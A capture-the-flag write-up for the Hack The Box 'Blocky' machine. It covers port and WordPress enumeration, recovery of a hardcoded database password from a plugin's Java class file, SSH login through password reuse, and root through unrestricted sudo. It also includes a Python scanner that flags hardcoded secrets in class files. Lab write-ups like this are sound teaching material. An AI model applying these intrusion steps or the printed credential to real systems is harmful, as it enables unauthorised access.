HTB - Blocky

Getting Root:

  1. Found a file under /plugins which contained credentials to phpMyAdmin (a hardcoded database password inside a compiled Java plugin).

  2. Found a user named notch from the WordPress scan and was able to ssh to the box using the password found in the file from step 1 (password reuse).

  3. The user had (ALL : ALL) ALL in the sudoers file, so we were able to get root with sudo.

Tools Used:

wpscan, dirsearch.py, jar, javap

Nmap

nmap -sC -sV -p- 10.10.10.37 -oA nmap/Blocky.allports                                                                                                          
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 00:30 EDT
Nmap scan report for 10.10.10.37
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.88 seconds

Enumeration

WPScan

Found a user named: notch

wpscan --url http://10.10.10.37 -e
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.11
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Tue Mar 31 01:42:55 2020

Interesting Finding(s):

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Dirsearch.py

# dirsearch.py -u http://10.10.10.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E --plain-text-report Blocky_Dirb.txt

200   51KB   http://10.10.10.37:80/
301   309B   http://10.10.10.37:80/wiki
301   315B   http://10.10.10.37:80/wp-content
301   312B   http://10.10.10.37:80/plugins
301   316B   http://10.10.10.37:80/wp-includes
301   315B   http://10.10.10.37:80/javascript
301   313B   http://10.10.10.37:80/wp-admin
301   315B   http://10.10.10.37:80/phpmyadmin
403   299B   http://10.10.10.37:80/server-status

There were two files under http://10.10.10.37/plugins, so we decided to have a look.

We downloaded both files and checked them for anything interesting:

# The two downloaded files
BlockyCore.jar
griefprevention-1.11.2-3.1.1.298.jar


# To look at their contents we can use:
jar -tf BlockyCore.jar 
# The result is something like:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.class

# We can use javap to disassemble the class file; string literals loaded with ldc show up in the comments
javap -c com/myfirstplugin/BlockyCore.class

# That produced the following output
Compiled from "BlockyCore.java"
public class com.myfirstplugin.BlockyCore {
  public java.lang.String sqlHost;

  public java.lang.String sqlUser;

  public java.lang.String sqlPass;

  public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return

Credentials:

root:8YsqfCTnvxAUeduzjNSXe22
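The credentials above were sitting in the class file's constant pool, which is where every ldc'd string literal lives. As an added example (not part of the original writeup), the Python below walks a .class file's constant pool and lists the literals referenced by CONSTANT_String entries, then flags ones that look like secrets; build_class fabricates a header-plus-constant-pool file for offline testing and looks_like_secret is a constructed heuristic. Running this over plugin jars before deploying them catches hardcoded credentials without having to read javap output by hand.

```python
import struct

# Payload sizes (bytes) of constant-pool tags other than CONSTANT_Utf8 (tag 1).
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
              12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def string_literals(class_bytes: bytes) -> list[str]:
    """Return the literals referenced by CONSTANT_String (tag 8) entries; only header + pool are read."""
    if class_bytes[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", class_bytes, 8)  # constant_pool_count
    pos, index, utf8, refs = 10, 1, {}, []
    while index < count:
        tag = class_bytes[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack_from(">H", class_bytes, pos)
            utf8[index] = class_bytes[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag in FIXED_SIZE:
            if tag == 8:
                refs.append(struct.unpack_from(">H", class_bytes, pos)[0])
            pos += FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at offset {pos - 1}")
        index += 2 if tag in (5, 6) else 1  # long/double occupy two pool slots
    return [utf8[r] for r in refs if r in utf8]


def looks_like_secret(value: str) -> bool:
    """Constructed heuristic: a long alphanumeric literal mixing digits and both cases."""
    return (len(value) >= 16 and value.isalnum() and any(c.isdigit() for c in value)
            and any(c.islower() for c in value) and any(c.isupper() for c in value))


def build_class(literals: list[str]) -> bytes:
    """Constructed test input: header + pool with Utf8 at index 2i+1 and String at 2i+2."""
    pool = b""
    for i, lit in enumerate(literals):
        pool += b"\x01" + struct.pack(">H", len(lit)) + lit.encode()
        pool += b"\x08" + struct.pack(">H", 2 * i + 1)
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 2 * len(literals) + 1) + pool


if __name__ == "__main__":
    sample = build_class(["localhost", "root", "8YsqfCTnvxAUeduzjNSXe22"])  # literals javap showed above
    for literal in string_literals(sample):
        print(("SECRET? " if looks_like_secret(literal) else "        ") + literal)
```

For a real jar, unzip it and pass each .class file's bytes to string_literals; the parser stops after the constant pool, so fields and methods never need to be decoded.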

Exploitation

Using those credentials, we can log in to phpMyAdmin.

More usefully, the same password also works for the user notch (found by WPScan): the password was reused for the shell account, so we can ssh to the box and get the user flag.

ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Mar 31 01:00:33 2020 from 10.10.14.3
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) 

Privilege Escalation

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ 
notch@Blocky:~$ 
notch@Blocky:~$ sudo su -
root@Blocky:~# 
root@Blocky:~# id 
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# 
root@Blocky:~# 
